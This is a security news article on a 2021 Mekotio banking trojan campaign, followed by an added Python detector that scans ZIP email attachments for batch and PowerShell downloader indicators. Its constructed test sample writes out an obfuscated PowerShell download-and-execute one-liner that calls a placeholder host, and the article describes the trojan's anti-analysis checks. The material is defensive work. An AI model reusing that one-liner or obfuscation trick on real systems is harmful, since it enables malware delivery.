New version of Mekotio banking trojan spotted in the wild
A new version of a banking trojan known as Mekotio is being deployed in the wild, with malware analysts reporting that it's using a new, stealthier infection flow. The last notable activity of Mekotio dates back to the summer of 2020 when the trojan's operators deployed it in a campaign targeting Latin American countries. The targeting scope appears to be the same in recent attacks, with Spanish being the language of choice for the phishing emails that start the infection chain.
The infection begins with a phishing email carrying a ZIP attachment that contains an obfuscated batch script; the batch script fetches and executes a PowerShell script. Once launched, the PowerShell script performs basic location and anti-analysis checks and only then downloads a second ZIP archive. If the checks confirm that the victim is in Latin America and that the malware is not running on a virtual machine, the second ZIP, which contains the Mekotio payload as a DLL, is extracted.
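The two-stage chain described above (ZIP attachment, obfuscated batch script, PowerShell downloader) is a pattern that mail-gateway or sandbox tooling can flag before the payload is ever fetched. The following Python is an added example written for this page, not code from the article or from any vendor analysis: it opens a ZIP attachment in memory, undoes the common batch trick of splitting a command name across environment variables, and scores each script member against download-and-execute indicators. The sample archive, its file names and the placeholder URL are constructed for the example and are not real Mekotio artifacts.

```python
import io
import re
import zipfile

# Member extensions worth inspecting as scripts inside an email attachment.
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs", ".js", ".jse", ".wsf", ".ps1", ".hta")

# Indicator patterns, matched case-insensitively against the deobfuscated text.
# Several of these together describe a "launch PowerShell, fetch, run in memory" stage.
INDICATORS = {
    "powershell_launch": r"powershell",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "exec_policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "remote_fetch": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b",
    "in_memory_exec": r"\biex\b|invoke-expression",
}

SET_RE = re.compile(r"\bset\s+\"?([A-Za-z_][A-Za-z0-9_]*)=([^\"&\r\n]*)\"?", re.IGNORECASE)
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)%")


def resolve_batch_variables(text: str) -> str:
    """Undo the trick of assembling a command from batch variables,
    e.g. 'set a=pow&set b=ershell' followed by '%a%%b%' -> 'powershell'."""
    env = {m.group(1).lower(): m.group(2) for m in SET_RE.finditer(text)}
    # Iterate a few times because a substituted value may itself reference %var%.
    for _ in range(5):
        expanded = VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)
        if expanded == text:
            break
        text = expanded
    return text


def scan_script(text: str) -> list[str]:
    """Return the names of the indicators present in one script body."""
    normalized = resolve_batch_variables(text).lower()
    return [name for name, pattern in INDICATORS.items() if re.search(pattern, normalized)]


def scan_zip_attachment(zip_bytes: bytes) -> list[dict]:
    """Inspect every script-like member of a ZIP attachment.
    Returns one finding per flagged member; three or more indicators
    together are treated as a downloader stage rather than a single hit."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(SCRIPT_EXTENSIONS):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            hits = scan_script(text)
            if hits:
                findings.append({
                    "member": info.filename,
                    "indicators": hits,
                    "verdict": "suspicious" if len(hits) >= 3 else "review",
                })
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample attachment for this example (not a real Mekotio file).
    The batch body only contains a placeholder URL and is here as detector input."""
    bat = (
        "@echo off\r\n"
        "set a=pow&set b=ershell\r\n"
        "%a%%b% -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://placeholder.invalid/stage2.ps1')\"\r\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("factura.bat", bat)                 # invoice-themed lure name, constructed
        zf.writestr("leeme.txt", "documento adjunto")   # benign member, must not be flagged
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip_attachment(build_sample_zip()):
        print(finding)
```

The variable-resolution step matters more than the indicator list: a gateway rule that only greps for the literal string "powershell" misses a batch file that never contains it, while the same file after expansion is plain to see. Extending the resolver to the other obfuscation styles seen in the wild (caret-escaped characters, substring expansion) follows the same shape.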
Source: bleepingcomputer.com
04 November 2021